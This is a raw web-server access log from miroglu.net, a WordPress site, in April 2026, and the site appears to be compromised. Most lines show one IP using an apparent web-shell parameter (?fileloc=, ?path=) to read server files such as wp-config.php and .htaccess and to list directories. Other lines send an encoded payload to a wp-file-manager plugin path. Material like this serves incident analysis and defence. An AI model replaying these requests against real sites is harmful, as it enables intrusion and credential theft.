209.50.180.2 - - [26/Apr/2026:09:16:23 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/readme.html&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8502 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:14:24 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373636342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343036342q3433633962303935326165616662313064393033306538626539663634623839222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:16:24 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/classm.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5623 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:25 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/molaj.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8977 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:27 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/click.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6485 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.191.171.19 - - [26/Apr/2026:09:16:28 +0300] "GET /robots.txt HTTP/1.1" 200 626 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:16:28 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/mah.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6469 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:29 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/comment.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5545 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:31 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/license.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 10639 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.191.171.12 - - [26/Apr/2026:09:16:30 +0300] "GET /alive-blackjack-approach-grasp-the-overall-game-and-improve-your-88-lucky-charms-no-deposit-free-spins-payouts-online-inside-the-2026/ HTTP/1.1" 200 10060 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:16:31 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/content.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5571 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:33 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/kon.php8&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 30636 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:34 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/edit.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 339720 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:36 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/item.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6512 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:37 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/goods.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6295 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:38 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/index.php0&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 14475 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:39 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/googleaa60eb9ae1b0bd93.html&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5470 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
47.82.13.187 - - [26/Apr/2026:09:16:40 +0300] "GET /10419-2/ HTTP/2" 200 9595 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:40 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/index.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 14484 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:42 +0300] "GET / HTTP/1.1" 200 8483 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:43 +0300] "GET /?path=/ HTTP/1.1" 200 5435 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:44 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/xmlrpc.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 4731 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
142.44.228.5 - - [26/Apr/2026:09:16:44 +0300] "GET /shop/magnetomotive/inkle063606532960.html HTTP/2" 200 8013 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.50.180.2 - - [26/Apr/2026:09:16:45 +0300] "GET /?path=/var HTTP/1.1" 200 5439 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:14:46 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373638362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343038362q3239396664636133633434366364343431616634653039633838386634343166222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:16:46 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-trackback.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7274 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:47 +0300] "GET /?path=/var/www HTTP/1.1" 200 5469 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:48 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-slgnup.gz&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5463 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.191.171.8 - - [26/Apr/2026:09:16:49 +0300] "GET /h1-discover-tronscan-your-guide-to-tron-blockchain-management-h1/ HTTP/1.1" 200 10052 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:16:49 +0300] "GET /?path=/var/www/vhosts HTTP/1.1" 200 5476 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:50 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-signup.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 13936 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:52 +0300] "GET /?path=/var/www/vhosts/miroglu.net HTTP/1.1" 200 7475 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:53 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-settings.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 10846 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:54 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8470 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:55 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-mail.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8515 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:57 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/.tmb HTTP/1.1" 200 8604 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:58 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-load.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7244 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
66.249.73.162 - - [26/Apr/2026:09:16:57 +0300] "GET /?detail/686689001 HTTP/1.1" 200 30071 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:16:59 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/c6f01 HTTP/1.1" 200 5930 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:00 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-links-opml.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6623 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:01 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/images HTTP/1.1" 200 6203 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:03 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-cron.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5383 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:03 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin HTTP/1.1" 200 6970 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:04 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-config.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7129 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:06 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content HTTP/1.1" 200 3772 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:07 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-config-sample.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 26397 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:08 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes HTTP/1.1" 200 11888 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:15:08 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373730382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343130382q3637656635653533313962303266633163653035623963383766633633316233222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:17:09 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-comments-post.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6541 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:10 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/.htaccess&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6296 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:11 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-blog-header.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5794 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:12 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/55ece37ba5f55f1032982f56b7fbfb48&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5511 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:13 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-activate.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7998 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:15 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/admin.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 57455 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
54.39.89.121 - - [26/Apr/2026:09:17:15 +0300] "GET /shop/loudly/cartilaginous06516684198.html HTTP/2" 200 8033 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.50.180.2 - - [26/Apr/2026:09:17:16 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/robots.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 3339 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
66.249.73.165 - - [26/Apr/2026:09:17:15 +0300] "GET /?prizes/93848878 HTTP/1.1" 200 28933 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:17:17 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/buy.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6303 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:18 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/readme.html&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8502 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:19 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/classm.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5623 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:21 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/molaj.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 9040 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:22 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/click.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6485 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:23 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/mah.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6469 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:24 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/comment.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5545 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:25 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/license.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 10639 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:26 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/content.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5571 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:27 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/kon.php8&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 30636 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
66.249.73.164 - - [26/Apr/2026:09:17:27 +0300] "GET /shop/dictionaries/anamese063971952135.html HTTP/1.1" 200 29396 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
209.50.180.2 - - [26/Apr/2026:09:17:28 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/edit.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 339608 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:15:30 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373733302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343133302q3164336233326334376336646536333731306430643362616263656436393364222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:17:30 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/item.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6512 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
66.249.73.164 - - [26/Apr/2026:09:17:29 +0300] "GET /?detail/147644107 HTTP/1.1" 200 30048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
